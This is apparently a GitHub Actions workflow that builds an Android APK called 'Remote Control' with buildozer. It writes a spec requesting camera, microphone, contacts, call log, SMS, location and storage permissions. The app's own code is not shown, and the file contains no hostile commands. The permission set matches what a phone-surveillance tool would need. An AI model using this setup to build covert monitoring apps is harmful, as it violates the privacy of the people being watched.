name: Build Android APK

on:
  push:
    branches: [ main ]
  workflow_dispatch:

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
    - name: Checkout code
      uses: actions/checkout@v3

    - name: Setup Python
      uses: actions/setup-python@v4
      with:
        python-version: '3.10'

    - name: Install system dependencies
      run: |
        sudo apt update
        sudo apt install -y \
          git zip unzip openjdk-17-jdk \
          python3-pip autoconf libtool \
          libffi-dev libssl-dev \
          python3-dev python3-venv \
          libltdl-dev \
          libncurses5-dev \
          libsqlite3-dev libreadline-dev \
          libbz2-dev libgdbm-dev \
          zlib1g-dev uuid-dev \
          lzma-dev \
          libsdl2-dev libsdl2-image-dev \
          libsdl2-mixer-dev libsdl2-ttf-dev \
          ffmpeg

    - name: Install Python packages
      run: |
        pip install --upgrade pip
        pip install buildozer cython pillow

    - name: Create main.py
      run: |
        # نسخ الكود من المستودع
        if [ -f "main.py" ]; then
          echo "✅ main.py found"
        else
          echo "❌ main.py not found!"
          exit 1
        fi

    - name: Create buildozer.spec
      run: |
        cat > buildozer.spec << 'EOF'
[app]
title = Remote Control
package.name = remotecontrol
package.domain = org.remote
source.dir = .
source.include_exts = py,png,jpg
version = 0.1
requirements = python3,requests
orientation = portrait
fullscreen = 0

[buildozer]
log_level = 2
warn_on_root = 1

[android]
api = 30
minapi = 21
ndk = 23b
permissions = INTERNET,READ_EXTERNAL_STORAGE,WRITE_EXTERNAL_STORAGE,CAMERA,RECORD_AUDIO,READ_CONTACTS,READ_CALL_LOG,READ_SMS,ACCESS_FINE_LOCATION,ACCESS_COARSE_LOCATION
android.accept_sdk_license = True
android.entrypoint = main.py
android.archs = arm64-v8a, armeabi-v7a
android.add_src = 
android.gradle_dependencies = 

[requirements]
python3 = 
requests = 
EOF

    - name: Build APK
      run: |
        buildozer -v android debug

    - name: Upload APK
      uses: actions/upload-artifact@v3
      with:
        name: android-remote-control-apk
        path: bin/*.apk
